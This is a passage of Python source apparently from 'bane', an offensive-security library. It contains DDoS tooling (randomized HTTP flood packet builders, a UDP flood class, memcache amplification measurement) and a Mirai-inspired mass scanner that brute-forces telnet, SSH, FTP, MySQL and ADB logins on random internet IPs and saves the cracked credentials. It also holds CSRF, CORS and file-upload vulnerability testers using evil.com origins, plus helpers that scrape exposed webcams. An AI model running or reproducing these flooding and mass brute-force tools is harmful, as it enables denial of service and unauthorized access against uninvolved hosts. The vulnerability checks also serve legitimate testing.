            s.close()
            break
        except:
            pass
        if len(o) == 0:
            break
        else:
            d += o
    a = len(req)
    b = len(d)
    c = round(len(d) * 1. / len(req), 3)
    return {
        'protocol': 'memcache',
        'ip': u,
        'sent': a,
        'received': b,
        'amplification_factor': c,
        }




import requests, cfscrape, socks, os, sys, urllib, socket, random, time, threading, ssl
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# import the dependencies for each python version
if sys.version_info < (3, 0):
    # Python 2.x
    import httplib
    import urllib2
    try:
        from scapy.config import conf

        conf.ipv6_enabled = False
        from scapy.all import *
    except:
        pass
else:
    # Python 3.x
    import http.client

    httplib = http.client
    import urllib.request

    urllib2 = urllib.request
    from kamene.config import conf

    conf.ipv6_enabled = False
    from kamene.all import *
from struct import *
from bane.scanners.botnet.iot import getip
from bane.common.payloads import *
from bane.utils.proxer import *

if os.path.isdir("/data/data") == True:
    adr = True  # the device is an android
if os.path.isdir("/data/data/com.termux/") == True:
    termux = True  # the application which runs the module is Termux
if (termux == False) or (adr == False):
    from bane.utils.swtch import *

def reorder_headers_randomly(s):
    b = s.split("\r\n\r\n")[1]
    a = s.split("\r\n\r\n")[0]
    m = a.split("\r\n")[0]
    c = a.split("\r\n")[1:]
    random.shuffle(c)
    return m + "\r\n" + "\r\n".join(c) + "\r\n\r\n" + b


def random_param():
    a = random.randint(1, 2)
    if a == 1:
        return str(random.randint(1, 1000))
    else:
        return random.choice(lis)


def setup_http_packet(
    target,
    ty,
    paths,
    post_field_min,
    post_field_max,
    post_min,
    post_max,
    cookie,
    user_agents,
):
    pa = random.choice(paths)  # bypassing cache engine
    q = ""
    for i in range(random.randint(2, 5)):
        q += random_param() + random_param()
    p = ""
    for i in range(random.randint(2, 5)):
        p += random_param() + random_param()
    if "?" in pa:
        jo = "&"
    else:
        jo = "?"
    pa += jo + q + "=" + p
    # setting random headers
    for l in range(random.randint(1, 5)):
        ed = random.choice(ec)
        oi = random.randint(1, 3)
        if oi == 2:
            gy = 0
            while gy < 1:
                df = random.choice(ec)
                if df != ed:
                    gy += 1
            ed += ", "
            ed += df
    l = random.choice(al)
    for n in range(random.randint(0, 5)):
        l += ";q={},".format(round(random.uniform(0.1, 1), 1)) + random.choice(al)
    kl = random.randint(1, 2)
    ck = ""
    if cookie:
        ck = "Cookie: " + cookie + "\r\n"
    if ty == 1:
        m = "GET {} HTTP/1.1\r\n{}User-Agent: {}\r\nAccept: {}\r\nAccept-Language: {}\r\nAccept-Encoding: {}\r\nAccept-Charset: {}\r\nKeep-Alive: {}\r\nConnection: Keep-Alive\r\nCache-Control: {}\r\nReferer: {}\r\nHost: {}\r\n\r\n".format(
            pa,
            ck,
            random.choice(user_agents),
            random.choice(a),
            l,
            ed,
            random.choice(ac),
            random.randint(100, 1000),
            random.choice(cc),
            (
                random.choice(referers)
                + random.choice(lis)
                + str(random.randint(0, 100000000))
                + random.choice(lis)
            ),
            target,
        )
    else:
        k = ""
        for _ in range(random.randint(post_field_min, post_field_max)):
            k += random.choice(lis)
        j = ""
        for x in range(random.randint(post_min, post_max)):
            j += random.choice(lis)
        par = k + "=" + j
        m = "POST {} HTTP/1.1\r\n{}User-Agent: {}\r\nAccept-language: {}\r\nConnection: keep-alive\r\nKeep-Alive: {}\r\nContent-Length: {}\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: {}\r\nHost: {}\r\n\r\n{}".format(
            pa,
            ck,
            random.choice(user_agents),
            l,
            random.randint(300, 1000),
            len(par),
            (
                random.choice(referers)
                + random.choice(lis)
                + str(random.randint(0, 100000000))
                + random.choice(lis)
            ),
            target,
            par,
        )
    return reorder_headers_randomly(m)


def get_public_dns(timeout=15):
    try:
        return (
            requests.get(
                "https://public-dns.info/nameservers.txt", timeout=timeout
            ).text
        ).split("\n")
    except:
        return []


class DDoS_Class:

    def done(self):
        if "stop" in dir(self):
            return False
        return True

    def reset(self):
        l = []
        for x in self.__dict__:
            self.__dict__[x] = None
            l.append(x)
        for x in l:
            delattr(self, x)

    def kill(self):
        self.stop = True
        a = self.__dict__["counter"]
        self.reset()  # this will kill any running threads instantly by setting all the attacking information to "None" and cause error which is handled with the "try...except..." around the main while loop
        return a



from bane.gather_info.utils import *


def myip(proxy=None, timeout=15):
    """
    this function is for getting your ip using: ipinfo.io
    usage:
    >>>import bane
    >>>bane.myip()
    xxx.xx.xxx.xxx"""
    try:
        return requests.get(
            "http://ipinfo.io/ip",
            headers={"User-Agent": random.choice(ua)},
            proxies=proxy,
            timeout=timeout,
        ).text.strip()
    except:
        pass
    return ""



def geoip(u, timeout=15, proxy=None):
    """
    this function is for getting: geoip informations
    """
    try:
        r = requests.get(
            "https://geoip-db.com/jsonp/" + u,
            headers={"User-Agent": random.choice(ua)},
            proxies=proxy,
            timeout=timeout,
        ).text
        return json.loads(r.split("(")[1].split(")")[0])
    except:
        pass
    return {}


def reverse_ip_lookup(u, timeout=10, logs=True, returning=False, proxy=None):
    """
    this function is for: reverse ip look up
    if you've used it 100 times in 24 hours, your IP will be banned by "api.hackertarget.com" so i highly recommand you to use the "proxy" option by adding a http(s) proxy:

    bane.reverse_ip_lookup('XXX.XXX.XXX.XXX',proxy='IP:PORT')

    """
    try:
        r = requests.get(
            "https://api.hackertarget.com/reverseiplookup/?q=" + u,
            headers={"User-Agent": random.choice(ua)},
            proxies=proxy,
            timeout=timeout,
        ).text
        return r.split("\n")
    except Exception as ex:
        pass
    return []




import os, sys, socket, random, time, threading, xtelnet
from bane.common.payloads import *
from bane.scanners.vulnerabilities.vulns import adb_exploit, exposed_telnet
from ftplib import FTP

from bane.bruteforce.hydra import *
from bane.utils.handle_files import write_file


def getip():
    """
    this function was inspired by the scanning file in mirai's source code to returns a safe IP to bruteforce."""
    d = [3, 6, 7, 10, 11, 15, 16, 21, 22, 23, 26, 28, 29, 30, 33, 55, 56, 127, 214, 215]
    f = [100, 169, 172, 198]
    while True:
        o1 = random.randint(1, 253)
        o2 = random.randint(0, 254)
        if o1 not in d:
            if o1 in f:
                if (o1 == 192) and (o2 != 168):
                    return "{}.{}.{}.{}".format(
                        o1, o2, random.randint(0, 255), random.randint(0, 255)
                    )
                if (o1 == 172) and ((o2 <= 16) and (o2 >= 32)):
                    return "{}.{}.{}.{}".format(
                        o1, o2, random.randint(0, 255), random.randint(0, 255)
                    )
                if (o1 == 100) and (o2 != 64):
                    return "{}.{}.{}.{}".format(
                        o1, o2, random.randint(0, 255), random.randint(0, 255)
                    )
                if (o1 == 169) and (o2 != 254):
                    return "{}.{}.{}.{}".format(
                        o1, o2, random.randint(0, 255), random.randint(0, 255)
                    )
                if (o1 == 198) and (o2 != 18):
                    return "{}.{}.{}.{}".format(
                        o1, o2, random.randint(0, 255), random.randint(0, 255)
                    )
            else:
                return "{}.{}.{}.{}".format(
                    o1, o2, random.randint(0, 255), random.randint(0, 255)
                )


"""
  the following functions are used to scan safe IPs all over the internet with a word_list, it can scan bruteforce their: ftp, ssh, telnet, smtp and mysql logins then save them on text files in the same directory.
  it's highly recommended to be used with a VPS or your slow internet speed will be an obstacle to your scan.
"""


class mass_scan:
    def __init__(
        self,
        file_name="results.csv",
        protocol="telnet",
        telnet_bots=True,
        threads_daemon=True,
        logs=True,
        threads=100,
        word_list=[],
        ip_range=None,
        timeout=7,
        p=23,
    ):
        self.word_list = word_list
        self.logs = logs
        self.protocol = protocol.lower()
        self.stop = False
        self.ip_range = ip_range
        self.timeout = timeout
        self.port = p
        self.result = []
        self.telnet_bots = telnet_bots
        self.file_name = file_name
        if os.path.exists(self.file_name) == False:
            write_file("protocol,ip,port,username,password", self.file_name)
        for x in range(threads):
            t = threading.Thread(target=self.scan)
            t.daemon = threads_daemon
            t.start()

    def scan(self):
        try:
            time.sleep(1)
            while True:
                try:
                    if self.stop == True:
                        break
                    if self.ip_range == None:
                        ip = getip()
                    else:
                        ip = self.ip_range.format(
                            random.randint(0, 255),
                            random.randint(0, 255),
                            random.randint(0, 255),
                            random.randint(0, 255),
                        )
                    i = False
                    try:
                        so = socket.socket()
                        so.settimeout(self.timeout)
                        so.connect((ip, self.port))
                        i = True
                        so.close()
                    except:
                        pass
                    if self.stop == True:
                        break
                    if i == True:
                        if self.protocol == "adb":
                            q = adb_exploit(ip, timeout=self.timeout, p=self.port)
                            if q == True:
                                res = "adb:{}:{}::".format(ip, self.port)
                                write_file(res, self.file_name)
                                self.result.append(res)
                                if self.logs == True:
                                    print(res)
                        else:
                            if self.protocol == "ssh":
                                func = ssh
                            elif self.protocol == "telnet":
                                func = telnet
                            elif self.protocol == "ftp":
                                func = ftp
                            elif self.protocol == "mysql":
                                func = mysql
                            for x in self.word_list:
                                if self.stop == True:
                                    break
                                try:
                                    username = x.split(":")[0]
                                    password = x.split(":")[1]
                                    if (
                                        self.protocol == "telnet"
                                        and self.telnet_bots == True
                                    ):
                                        q = func(
                                            ip,
                                            username,
                                            password,
                                            timeout=self.timeout,
                                            p=self.port,
                                            bot_mode=True,
                                        )
                                    else:
                                        q = func(
                                            ip,
                                            username,
                                            password,
                                            timeout=self.timeout,
                                            p=self.port,
                                        )
                                    if q == True:
                                        res = "{},{},{},{},{}".format(
                                            self.protocol,
                                            ip,
                                            self.port,
                                            username,
                                            password,
                                        )
                                        write_file(res, self.file_name)
                                        self.result.append(res)
                                        if self.logs == True:
                                            print(res)
                                        break
                                except:
                                    pass
                except:
                    pass
            self.kill()
        except:
            pass

    def done(self):
        if "stop" in dir(self):
            return False
        return True

    def reset(self):
        l = []
        for x in self.__dict__:
            self.__dict__[x] = None
            l.append(x)
        for x in l:
            delattr(self, x)

    def kill(self):
        self.stop = True
        a = self.__dict__["found"]
        self.reset()  # this will kill any running threads instantly by setting all the attacking information to "None" and cause error which is handled with the "try...except..." around the main while loop
        return a



from bane.scanners.vulnerabilities.utils import *


def csrf_filter_tokens(u, proxy=None, timeout=10, user_agent=None, cookie=None,headers={}):
    if not cookie or len(cookie.strip()) == 0:
        raise Exception(
            "This attack requires authentication !! You need to set a Cookie"
        )
    res = {"Vulnerable": [], "Safe": []}
    f = forms_parser(
        u, timeout=timeout, user_agent=user_agent, cookie=cookie, proxy=proxy, headers=headers
    )
    f1 = forms_parser(
        u, timeout=timeout, user_agent=user_agent, cookie=cookie, proxy=proxy, headers=headers
    )
    coun = -1
    for x in f:
        coun += 1
        vuln = True
        hd_v = False
        # print(Fore.BLUE+"Form: "+Fore.WHITE+str(f.index(x))+Fore.BLUE+"\nAction: "+Fore.WHITE+x['action']+Fore.BLUE+"\nMethod: "+Fore.WHITE+x['method']+Style.RESET_ALL)
        for y in x["inputs"]:
            # print("Name: {} | Type: {} | Value: {}".format(y["name"],y["type"],y["value"]))
            if y["type"].lower() == "hidden":
                hd_v = True
            if y["type"].lower() == "hidden" and any(
                ele in y["name"].lower() for ele in csrf_strings
            ):  # and y["value"]==f1f["inputs"][con]["value"]:
                vuln = False
        if vuln == True:
            if (
                hd_v == True
            ):  # if there is no Anti-CSRF Tokens then we check if the Hidden fields can be predicted or not (keep their values or change them by request)
                # print(Fore.YELLOW+"[i] Validating hidden values' prediction..."+Style.RESET_ALL)
                for i in x["hidden_values"]:
                    if len(x["hidden_values"][i]) > 0:
                        if x["hidden_values"][i] != f1[coun]["hidden_values"][i]:
                            vuln = False
        if vuln == True:
            colr = Fore.GREEN
            """if logs==True:
    print (colr+"[+] Vulnerable"+Style.RESET_ALL)"""
            res["Vulnerable"].append(x)
        else:
            colr = Fore.RED
            """if logs==True:
    print (colr+"[-] Not vulnerable"+Style.RESET_ALL)"""
            res["Safe"].append(x)
    return res


def csrf_forms(
    u,
    proxy=None,
    timeout=10,
    show_warnings=True,
    user_agent=None,
    cookie=None,
    replaceble_parameters={"phpvalue": ((".", ""),)},
    file_extension="png",
    fill_empty=10,
    referer="http://www.evil.com",
    leave_empty=[],
    dont_send=[],
    mime_type=None,
    predefined_inputs={},
    headers={}
):
    vu = []
    if not cookie or len(cookie.strip()) == 0:
        raise Exception(
            "This attack requires authentication !! You need to set a Cookie"
        )
    v = csrf_filter_tokens(
        u, proxy=proxy, timeout=timeout, user_agent=user_agent, cookie=cookie, headers=headers
    )["Vulnerable"]
    if user_agent:
        h = {"User-Agent": user_agent}
    else:
        h = {"User-Agent": random.choice(ua)}
    h.update({"cookie": cookie})
    h.update(
        {
            "Referer": referer,
            "Origin": referer.split("://")[0]
            + "://"
            + referer.split("://")[1].split("/")[0],
        }
    )
    h.update(headers)
    for x in v:
        x = form_filler(
            x,
            "",
            "",
            file_extension=file_extension,
            auto_fill=fill_empty,
            leave_empty=leave_empty,
            dont_send=dont_send,
            mime_type=mime_type,
            predefined_inputs=predefined_inputs,
        )
        d, f = setup_to_submit(x)
        for g in d:
            for y in replaceble_parameters:
                if x == y:
                    for z in replaceble_parameters[y]:
                        d[g] = d[g].replace(z[0], z[1])
        l = [d[y] for y in d]
        for j in f:
            l.append(f[j][0])
        if x["method"] == "get":
            r = requests.get(
                x["action"], params=d, proxies=proxy, timeout=timeout, headers=h,verify=False,
            )
        else:
            if "application/json" in x["enctype"]:
                d = json.dumps(d)
            r = requests.post(
                x["action"], data=d, files=f, proxies=proxy, timeout=timeout, headers=h,verify=False,
            )
        if all(i in r.text for i in l):
            vu.append({'form':x, 'status':"Found all data"})
        elif r.status_code == 200 and any(i in r.text for i in l):
            vu.append({'form':x, 'status':"Found some data"})
            if show_warnings == True:
                print(
                    "Warning: HTTP Status Code: 200 , but we didn't find some of our submitted data, so it's probably vulnerable but they are saved somewhere else..\nPlease check manually by visiting the form again"
                )
        elif (
            r.status_code == 200
            and not any(i in r.text for i in l)
            and any(
                i in r.text.lower() for i in ["unauthorized", "invalid", "unacceptable"]
            )
        ):
            return False
        elif r.status_code == 200 and not any(i in r.text for i in l):
            if show_warnings == True:
                print(
                    "Warning: HTTP Status Code: 200 , but we didn't find any of our submitted data, so it's probably vulnerable but they are saved somewhere else..\nPlease check manually by visiting the form again"
                )
            vu.append({'form':x, 'status':"Found no data but Status Code: 200"})
    return vu


def csrf(
    u,
    max_pages=5,
    logs=True,
    proxy=None,
    timeout=10,
    show_warnings=True,
    user_agent=None,
    cookie=None,
    replaceble_parameters={"phpvalue": ((".", ""),)},
    file_extension="png",
    fill_empty=10,
    referer="http://www.evil.com",
    leave_empty=[],
    dont_send=[],
    mime_type=None,
    predefined_inputs={},
    pages=[],
    headers={}
):
    l=[]
    if pages==[]:
        pages=spider_url(u,cookie=cookie,max_pages=max_pages,timeout=timeout,user_agent=user_agent,proxy=proxy)
    for x in pages:
        if logs==True:
            print('\n\nPage: {}\n'.format(x))
        result=csrf_forms(x,
                        proxy=proxy,
                        timeout=timeout,
                        show_warnings=show_warnings,
                        user_agent=user_agent,
                        cookie=cookie,
                        replaceble_parameters=replaceble_parameters,
                        file_extension=file_extension,
                        fill_empty=fill_empty,
                        referer=referer,
                        leave_empty=leave_empty,
                        dont_send=dont_send,
                        mime_type=mime_type,
                        predefined_inputs=predefined_inputs,
                        headers=headers)
        if logs==True:
            for r in result:
                print(r)
        l.append({'page':x,'result':result})
    return  [x for x in l if x['result']!=[]]




from bane.ddos.utils import *

class udp_flood(DDoS_Class):
    def __init__(
        self,
        u,
        p=80,
        threads_daemon=True,
        interval=0.001,
        min_size=10,
        max_size=10,
        connection=True,
        duration=60,
        threads=1,
        limiting=True,
        logs=False,
    ):
        self.target = u
        self.port = p
        self.interval = interval
        self.min_size = min_size
        self.max_size = max_size
        self.connection = connection
        self.duration = duration
        self.limiting = limiting
        self.logs = logs
        self.stop = False
        self.counter = 0
        self.start = time.time()
        for x in range(threads):
            try:
                t = threading.Thread(target=self.attack)
                t.daemon = threads_daemon
                t.start()
            except:
                pass

    def attack(self):
        try:
            time.sleep(1)
            tm = time.time()
            size = 0
            while True:
                if (
                    int(time.time() - self.start) >= self.duration
                ):  # this is a safety mechanism so the attack won't run forever
                    break
                if self.stop == True:
                    break
                try:
                    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                    if self.connection == True:
                        s.connect((self.target, self.port))
                    msg = ""
                    for x in range(random.randint(self.min_size, self.max_size)):
                        msg += random.choice(lis)
                    if len(msg) > 1400:
                        msg = msg[
                            0:1400
                        ]  # make sure all payloads' sizes are on the right range
                    s.sendto((msg.encode("utf-8")), (self.target, self.port))
                    size += len(msg)
                    self.counter += 1
                    if (self.logs == True) and (int(time.time() - tm) == 1):
                        sys.stdout.write(
                            "\rPackets: {} | Bytes/s: {}   ".format(self.counter, size)
                        )
                        sys.stdout.flush()
                        tm = time.time()
                        size = 0
                    if self.limiting == True:
                        time.sleep(self.interval)
                except:
                    try:
                        time.sleep(self.interval)
                    except:
                        pass
            self.kill()
        except:
            pass



#coding: utf-8


__version__='4.9.7'

__author__="Ala Bouali"

__author_nicknames__=["Merlin", "Chaotic Mind", "Ala", "Mr. Ego"]

__author_email__="ala.bouali.1997@gmail.com"

__author_github__="https://github.com/AlaBouali"

__author_linkedin__="https://tn.linkedin.com/in/ala-bouali"


from bane.bruteforce import *
from bane.common import *
from bane.cryptographers import *
from bane.ddos import *
from bane.gather_info import *
from bane.scanners import *
from bane.utils import *


import cgi, requests, os, random, re, hashlib, urllib, sys, cfscrape, json, gc
from bane.cryptographers import *
from bane.utils import *
if sys.version_info < (3, 0):
    import HTMLParser
else:
    import html.parser as HTMLParser
import bs4
from bs4 import BeautifulSoup
from bane.common import *
from bane.utils.pager import crawl



def get_cf_cookie(domain, user_agent):
    try:
        s = cfscrape.create_scraper()
        c = s.get_cookie_string("http://" + domain, user_agent=user_agent)
        return c[0]
    except:
        return {}




def escape_html(s):
    """
    function to return escaped html string
    """
    return cgi.escape(s, quote=True)


def unescape_html(s):
    """
    function to return unescaped html string
    """
    return HTMLParser.HTMLParser().unescape(s).encode("utf-8")



def youtube_search(q, proxy=None, timeout=10):
    """
    this function is for searching on youtub and returning a links of related videos."""
    q = q.replace(" ", "+")
    u = "https://www.youtube.com/results"
    params = {"search_query": q}
    l = []
    try:
        r = requests.get(
            u,
            params,
            headers={"User-Agent": random.choice(ua)},
            proxies=proxy,
            timeout=timeout,
        ).text
        soup = BeautifulSoup(r, "html.parser")
        yt = soup.find_all(attrs={"class": "yt-uix-tile-link"})
        for vi in yt:
            try:
                vi = "https://www.youtube.com" + str(vi["href"])
                if vi not in l:
                    l.append(vi)
            except Exception as ex:
                pass
    except Exception as e:
        pass
    return l


def webcams(count=10, by={"country": "us"}, timeout=10):
    a = 0
    f = {}
    x = 1
    if by:
        key = list(by.keys())[0]
        if key not in ["country", "tag", "city", "timezone", "type"]:
            raise Exception(
                "Your search must be in one of these categories: country, city, timezone, type, tag"
            )
        value = by[key].lower()
        if "country" in by:
            if by["country"].lower() not in [
                "af",
                "ax",
                "al",
                "dz",
                "as",
                "ad",
                "ao",
                "ai",
                "aq",
                "ag",
                "ar",
                "am",
                "aw",
                "au",
                "at",
                "az",
                "bs",
                "bh",
                "bd",
                "bb",
                "by",
                "be",
                "bz",
                "bj",
                "bm",
                "bt",
                "bo",
                "bq",
                "ba",
                "bw",
                "br",
                "io",
                "bn",
                "bg",
                "bf",
                "bi",
                "cv",
                "kh",
                "cm",
                "ca",
                "ky",
                "cf",
                "td",
                "cl",
                "cn",
                "cx",
                "cc",
                "co",
                "km",
                "cd",
                "cg",
                "ck",
                "cr",
                "ci",
                "hr",
                "cu",
                "cw",
                "cy",
                "cz",
                "dk",
                "dj",
                "dm",
                "do",
                "ec",
                "eg",
                "sv",
                "gq",
                "er",
                "ee",
                "sz",
                "et",
                "fk",
                "fo",
                "fj",
                "fi",
                "fr",
                "gf",
                "pf",
                "tf",
                "ga",
                "gm",
                "ge",
                "de",
                "gh",
                "gi",
                "gr",
                "gl",
                "gd",
                "gp",
                "gu",
                "gt",
                "gg",
                "gn",
                "gw",
                "gy",
                "ht",
                "hm",
                "va",
                "hn",
                "hk",
                "hu",
                "is",
                "in",
                "id",
                "ir",
                "iq",
                "ie",
                "im",
                "il",
                "it",
                "jm",
                "jp",
                "je",
                "jo",
                "kz",
                "ke",
                "ki",
                "kp",
                "kr",
                "kw",
                "kg",
                "la",
                "lv",
                "lb",
                "ls",
                "lr",
                "ly",
                "li",
                "lt",
                "lu",
                "mo",
                "mk",
                "mg",
                "mw",
                "my",
                "mv",
                "ml",
                "mt",
                "mh",
                "mq",
                "mr",
                "mu",
                "yt",
                "mx",
                "fm",
                "md",
                "mc",
                "mn",
                "me",
                "ms",
                "ma",
                "mz",
                "mm",
                "na",
                "nr",
                "np",
                "nl",
                "nc",
                "nz",
                "ni",
                "ne",
                "ng",
                "nu",
                "nf",
                "mp",
                "no",
                "om",
                "pk",
                "pw",
                "ps",
                "pa",
                "pg",
                "py",
                "pe",
                "ph",
                "pn",
                "pl",
                "pt",
                "pr",
                "qa",
                "re",
                "ro",
                "ru",
                "rw",
                "bl",
                "sh",
                "kn",
                "lc",
                "mf",
                "pm",
                "vc",
                "ws",
                "sm",
                "st",
                "sa",
                "sn",
                "rs",
                "sc",
                "sl",
                "sg",
                "sx",
                "sk",
                "si",
                "sb",
                "so",
                "za",
                "gs",
                "ss",
                "es",
                "lk",
                "sd",
                "sr",
                "se",
                "ch",
                "sy",
                "tw",
                "tj",
                "tz",
                "th",
                "tl",
                "tg",
                "tk",
                "to",
                "tt",
                "tn",
                "tr",
                "tm",
                "tc",
                "tv",
                "ug",
                "ua",
                "ae",
                "gb",
                "us",
                "uy",
                "uz",
                "vu",
                "ve",
                "vn",
                "vg",
                "vi",
                "wf",
                "ye",
                "zm",
                "zw",
            ]:
                raise Exception("Unexisting Country code")
        url = "https://www.insecam.org/en/by{}/{}/?page=".format(key, value)
    else:
        url = "https://www.insecam.org/en/byrating/?page="
    while True:
        try:
            soup = BeautifulSoup(
                requests.get(
                    url + str(x),
                    headers={"User-Agent": random.choice(ua)},
                    timeout=timeout,
                ).text,
                "html.parser",
            )
            fi = soup.findAll("img", {"class": "thumbnail-item__img img-responsive"})
            for i in fi:
                j = HTMLParser.HTMLParser().unescape(i["src"])
                o = HTMLParser.HTMLParser().unescape(i["title"])
                f.update({j: o})
            if (len(fi) == 0) or (a == len(f)):
                break
            a = len(f)
        except Exception as e:
            break
        if len(f) >= int(count):
            break
        x += 1
    return {k: f[k] for k in list(f.keys())[: int(count)]}



from bane.scanners.vulnerabilities.utils import *


def cors_reflection(
    u,
    proxy=None,
    timeout=10,
    user_agent=None,
    cookie=None,
    origin="www.evil-domain.com",
    debug=False,
    fill=10,
    headers={}
):
    a = None
    b = None
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    if cookie:
        heads = {"User-Agent": us, "Cookie": cookie}
    else:
        heads = {"User-Agent": us}
    heads.update({"Origin": origin})
    heads.update(headers)
    try:
        r = requests.get(
            u, headers=heads, proxies=proxy, timeout=timeout, verify=False
        ).headers
        a = r.get("Access-Control-Allow-Origin", None)
        b = r.get("Access-Control-Allow-Credentials", None)
        if debug == True:
            for x in r:
                print(x + " : " + r[x])
        if a and b:
            if a == origin and b == "true":
                return (
                    True,
                    {
                        "Access-Control-Allow-Origin": a,
                        "Access-Control-Allow-Credentials": b,
                        "Vulnerable": True,
                    },
                )
    except:
        pass
    return (
        False,
        {
            "Access-Control-Allow-Origin": a,
            "Access-Control-Allow-Credentials": b,
            "Vulnerable": False,
        },
    )


def cors_wildcard(u, proxy=None, timeout=10, user_agent=None, cookie=None, debug=False,headers={}):
    a = None
    b = None
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    if cookie:
        heads = {"User-Agent": us, "Cookie": cookie}
    else:
        heads = {"User-Agent": us}
    heads.update({"Origin": "*"})
    heads.update(headers)
    try:
        r = requests.get(
            u, headers=heads, proxies=proxy, timeout=timeout, verify=False
        ).headers
        a = r.get("Access-Control-Allow-Origin", None)
        b = r.get("Access-Control-Allow-Credentials", None)
        if debug == True:
            for x in r:
                print(x + " : " + r[x])
        if a and b:
            if a == "*" and b == "true":
                return (
                    True,
                    {
                        "Access-Control-Allow-Origin": a,
                        "Access-Control-Allow-Credentials": b,
                        "Vulnerable": True,
                    },
                )
    except:
        pass
    return (
        False,
        {
            "Access-Control-Allow-Origin": a,
            "Access-Control-Allow-Credentials": b,
            "Vulnerable": False,
        },
    )


def cors_null(u, proxy=None, timeout=10, user_agent=None, cookie=None, debug=False,headers={}):
    a = None
    b = None
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    if cookie:
        heads = {"User-Agent": us, "Cookie": cookie}
    else:
        heads = {"User-Agent": us}
    heads.update({"Origin": "null"})
    heads.update(headers)
    try:
        r = requests.get(
            u, headers=heads, proxies=proxy, timeout=timeout, verify=False
        ).headers
        a = r.get("Access-Control-Allow-Origin", None)
        b = r.get("Access-Control-Allow-Credentials", None)
        if debug == True:
            for x in r:
                print(x + " : " + r[x])
        if a and b:
            if a == "null" and b == "true":
                return (
                    True,
                    {
                        "Access-Control-Allow-Origin": a,
                        "Access-Control-Allow-Credentials": b,
                        "Vulnerable": True,
                    },
                )
    except:
        pass
    return (
        False,
        {
            "Access-Control-Allow-Origin": a,
            "Access-Control-Allow-Credentials": b,
            "Vulnerable": False,
        },
    )




def proxies_select(proxy, proxies):
    if proxy:
        return proxy
    if proxies:
        return random.choice(proxies)
    return None


def cors_misconfigurations_urls(
    u,
    origin="www.evil-domain.com",
    origin_reflection=True,
    wildcard_origin=True,
    null_origin=True,
    proxy=None,
    proxies=None,
    timeout=10,
    user_agent=None,
    cookie=None,
    logs=True,
    debug=False,
    headers={}
):
    res = {}
    if origin_reflection == True:
        if logs == True:
            print("[*] Testing for: Origin Reflection...")
        tes1 = cors_reflection(
            u,
            origin=origin,
            cookie=cookie,
            user_agent=user_agent,
            timeout=timeout,
            proxy=proxies_select(proxy, proxies),
            debug=debug,
            headers=headers
        )
        if tes1[0] == True:
            res.update({"cors_reflection": tes1[1],'vulnerable':True})
            if logs == True:
                print("[+] Vulnerable !!")
        else:
            res.update({"cors_reflection": tes1[1],'vulnerable':False})
            if logs == True:
                print("[-] Not vulnerable")
    if wildcard_origin == True:
        if logs == True:
            print("[*] Testing for: Wildcard Origin...")
        tes2 = cors_wildcard(
            u,
            cookie=cookie,
            user_agent=user_agent,
            timeout=timeout,
            proxy=proxies_select(proxy, proxies),
            debug=debug,
            headers=headers
        )
        if tes2[0] == True:
            res.update({"wildcard_origin": tes2[1],'vulnerable':True})
            if logs == True:
                print("[+] Vulnerable !!")
        else:
            res.update({"wildcard_origin": tes2[1],'vulnerable':False})
            if logs == True:
                print("[-] Not vulnerable")
    if origin_reflection == True:
        if logs == True:
            print("[*] Testing for: Null Origin...")
        tes3 = cors_null(
            u,
            cookie=cookie,
            user_agent=user_agent,
            timeout=timeout,
            proxy=proxies_select(proxy, proxies),
            debug=debug,
            headers=headers
        )
        if tes3[0] == True:
            res.update({"null_origin": tes3[1],'vulnerable':True})
            if logs == True:
                print("[+] Vulnerable !!")
        else:
            res.update({"null_origin": tes3[1],'vulnerable':False})
            if logs == True:
                print("[-] Not vulnerable")
    return res



def cors_misconfigurations(
    urls,
    origin="www.evil-domain.com",
    origin_reflection=True,
    wildcard_origin=True,
    null_origin=True,
    proxy=None,
    proxies=None,
    timeout=10,
    user_agent=None,
    cookie=None,
    logs=True,
    debug=False,
    headers={}
):
    l=[]
    for x in urls:
        if logs==True:
            print('\n\nPage: {}\n'.format(x))
        result=cors_misconfigurations_urls(x,
                                            origin=origin,
                                            origin_reflection=origin_reflection,
                                            wildcard_origin=wildcard_origin,
                                            null_origin=null_origin,
                                            proxy=proxy,
                                            proxies=proxies,
                                            timeout=timeout,
                                            user_agent=user_agent,
                                            cookie=cookie,
                                            logs=logs,
                                            debug=debug,
                                            headers=headers
                                            )
        result={'vulnerable':result[0],'status':result[1]}
        if logs==True:
            for r in result:
                print(r)
        l.append({'page':x,'result':result})
    return  [x for x in l if x['result']['vulnerable']!=False]






from bane.scanners.vulnerabilities.utils import *


def file_upload_forms(
    u,
    proxy=None,
    timeout=10,
    show_warnings=True,
    user_agent=None,
    cookie=None,
    replaceble_parameters={"phpvalue": ((".", ""),)},
    file_extension="png",
    fill_empty=10,
    dont_change=[],
    referer=None,
    leave_empty=[],
    dont_send=[],
    mime_type=None,
    predefined_inputs={},
    headers={}
):
    l = []
    result=[]
    x = forms_parser(
        u, proxy=proxy, timeout=timeout, user_agent=user_agent, cookie=cookie
    )
    fos = get_upload_form(x)
    for fo in fos:
        d, f = setup_to_submit(
            form_filler(
                fo,
                "",
                "",
                mime_type=mime_type,
                file_extension=file_extension,
                predefined_inputs=predefined_inputs,
                leave_empty=leave_empty,
                dont_change=dont_change,
                dont_send=dont_send
            )
        )
        for x in d:
            for y in replaceble_parameters:
                if x == y:
                    for z in replaceble_parameters[y]:
                        d[x] = d[x].replace(z[0], z[1])
        if not referer or len(referer) == 0:
            referer = u
        for j in f:
            l.append(f[j][0])
        if user_agent:
            h = {"User-Agent": user_agent}
        else:
            h = {"User-Agent": random.choice(ua)}
        if "application/json" in fo["enctype"]:
            d = json.dumps(d)
        h.update({"cookie": cookie})
        h.update(
            {
                "Referer": referer,
                "Origin": referer.split("://")[0]
                + "://"
                + referer.split("://")[1].split("/")[0],
            }
        )
        h.update(headers)
        try:
            r = requests.post(
                fo["action"], data=d, files=f, proxies=proxy, timeout=timeout, headers=h,verify=False,
            )
            if (
                r.status_code == 200
                and not any(i in r.text for i in l)
                and any(
                    i in r.text.lower() for i in ["only accept", "invalid","not valid","not a valid", "unacceptable","not allowed","not accepted","not acceptable"]
                )
            ):
                pass#result.append({"form":fo,"vulnerable": False, 'status':"Unacceptable file extension"})
            elif all(i in r.text for i in l):
                result.append({"form":fo,"vulnerable":True, 'status':"Found all data"})
